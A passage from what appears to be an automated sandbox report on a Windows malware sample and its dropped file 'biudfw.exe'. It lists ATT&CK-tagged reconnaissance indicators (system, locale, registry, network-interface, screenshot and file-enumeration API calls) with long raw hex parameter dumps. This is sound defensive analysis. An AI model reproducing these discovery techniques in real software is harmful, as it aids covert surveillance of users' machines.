00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"biudfw.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9676d80a470000f0fd7f9a5caa7700e0fd7ff8ce280044f0fd7f00000000400000003f0000001e00000000f0fd7fecce2800c15caa776082b1771e00000000f0fd7f9a5caa7700e0fd7f10cf28005789a9778083b1771317a275d8eb9676 (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005876)\n \"biudfw.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006040)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-174", "type": 3, "relevance": 1, "name": "Tries to retrieve device driver information", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\SANDBOXFLTR\\INSTANCES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1652", "attck_id_wiki": "https://attack.mitre.org/techniques/T1652"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b22dd00220d129006d8211761c7a4a0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000630061003100610032003000390065003100350038003700350038003400610030003900340033003900390035003500380066006600320066006400350063006100330033003400360035006300660064003200320036006200330062003400390064002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2ba97719a29777d8eb9676ac0146000000460000000000000000000c00c000be030000000000000000000000000000000000000d00bb00be03000000000000000000005873460000000000200000000000000000000000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d8211766c424d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d8211768c444d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600852c00006cca290067e5a67700004600b84b4d00000000000000460000000000b84b4d0000000000312c001d80000000604e4d00c4004600108d4c00003b00000000460000000000b84b4d006011000000004600b0484d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d82117634464d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600502c00006cca290067e5a67700004600604d4d00000000000000460000000000604d4d0000000000fc2b00d78000000008504d00c4004600988c4c00003b00000000460000000000604d4d006011000000004600584a4d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d82117664474d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c4004600283346002a2c00006cca290067e5a67700004600904e4d00000000000000460000000000904e4d0000000000d62b00fd8000000038514d00c4004600988c4c00003b00000000460000000000904e4d006011000000004600884b4d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d82117694484d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600042c00006cca290067e5a67700004600c04f4d00000000000000460000000000c04f4d0000000000b02b009b8000000068524d00c4004600008d4c00003b00000000460000000000c04f4d006011000000004600b84c4d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d821176bc494d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600df2b00006cca290067e5a67700004600e8504d00000000000000460000000000e8504d00000000008b2b00a08000000090534d00c4004600988c4c00003b00000000460000000000e8504d006011000000004600e04d4d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d821176ec4a4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600b92b00006cca290067e5a6770000460018524d0000000000000046000000000018524d0000000000652b004e80000000c0544d00c4004600008d4c00003b0000000046000000000018524d006011000000004600104f4d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d8211761c4c4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c400460028334600932b00006cca290067e5a6770000460048534d0000000000000046000000000048534d00000000003f2b001480000000f0554d00c4004600008d4c00003b0000000046000000000048534d00601100000000460040504d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d821176444d4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d00f83b0000ff07000000004600000000007f070000c4004600283346006e2b00006cca290067e5a6770000460070544d0000000000000046000000000070544d00000000001a2b00318000000018574d00c4004600988c4c00003b0000000046000000000070544d00601100000000460068514d00f83b0000ff07000000004600000000007f070000c40046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036006e36d002fcca29006d8211767c4e4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004c003cd42900b3443a6905000000000000000000000000000000000000000000000000000000b801000000000000000000000000000054db29002f338802f8d82900f8d829005ecba676b801000000000000005da47654db29000e5da476ecd62900dcaaa876010000000000000072000000ffffffffffffffff74d4290078020000000000002500000074d429007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036001e28d002ccd429006d821176c45a4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff0200e90040000000620ba676000000005873460000000000500000000c5d4d0002000000608f49000000000001000008286d4c0080774600380ba67600d3290002000000b4d329003f08ed7502000000608f4900000000000100001888fbec75a4d32900c81ca8767ad5290095fbec75d8d42900608f490000000000000000000000000060d42900000046007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b228d00220d429006d821176c45a4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600aa31d00238cd29006d821176e45f4d0004010000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2ba97791c497770cde2900cc0146000000460000000000000000000b009701e6020000000000000000000000000000180000000c008e01e6020000c8ee2800acdd290070dd2900000000008e000000c0dd2900feffffff48dd2900cf00aa77d600aa7799c497778e00000047000000c0dd2900000000001cdd290095e1a577 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000a0294e0000000000843200b6340000c0c82b4e00c4004600981f4e00003b00000000460000000000a0294e006cdf29000464a97738014600e063a977bdc697770000000000004600a8294e006dd1ec755c4ea0026caec8750000000000000000d8be6876c83200fac40046000100000000004600500146000c000000a8294e000000000002000000180000002c00000048df29000000000000000000030000000cdf29003c6ea977000000000000000000000000904a4800c075f475904a480000000000c075f47528df290079daec75000000000200000080df2900ff2ba977 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004e00c0b74e00bbb74e00000000000000000000004600000000019ccf29000000000000dd290095e1a577f90b1700feffffff435ca9775059a977aa000000b8000000bab74e00b8b74e0024d129005cd5290000000000000000000000000000000000000000000000000000000000000000001c5ca87760d8a175ffffffff17000000d4d029002400000003000000c4d52900f0da29005cd529008600000000d1290096eda977e2b74e00a06a7f758600000024d129005cd529000000000086008800a06a7f7524d12900916c7f75e2b74e00a06a7f75a06a7f7594d5290002020000 (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"IsWow64Process\" with parameter \"5876\" - (UID: 00000000-00005876)\n \"biudfw.exe\" called \"IsWow64Process\" with parameter \"6040\" - (UID: 00000000-00006040)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"3956\" - (UID: 00000000-00003956)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"biudfw.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BIUDFW.EXE\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\BIUDFW.EXE\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SANFDR.BAT\")\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SANFDR.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"biudfw.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1711342155\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"biudfw.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1157695373\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"biudfw.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter biudfw.exe (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005876)\n \"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"ed09be6f5ebb23ca1a209e1587584a094399558ff2fd5ca33465cfd226b3b49d.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"biudfw.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": 